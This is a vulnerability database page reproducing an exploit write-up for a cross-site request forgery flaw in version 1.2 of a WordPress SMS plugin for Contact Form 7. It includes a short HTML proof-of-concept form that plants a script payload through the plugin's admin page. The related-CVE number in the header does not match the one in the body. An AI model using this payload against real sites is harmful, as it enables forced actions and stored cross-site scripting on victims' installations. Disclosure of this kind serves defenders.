Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2022-242721

Publish Date: 14 Feb 2022

Source

                							

                
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross-Site Request Forgery (CSRF)

# Date: 2022-02-09

# Author: Milad Karimi 

# Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/

# Version: 1.2

# Tested on: Windows 11

# CVE: CVE-2022-24272




1. Description:

The plugin International Sms For Contact Form 7 Integration for class-sms-log-display.php and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. 

Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue




2. Proof of Concept:




&lt;form method="post" action="https://example.com/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page="&gt;

    &lt;input type="text" value="&lt;script&gt;alert(1)&lt;/script&gt;" name="fcw[fcw_heading]"&gt;

    &lt;input type="submit" value="Save" name="submit"&gt;

&lt;/form&gt;

            
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

WordPress International SMS For Contact Form 7 Integration 1.2 CSRF

Vulmon Search

About

Products

Connect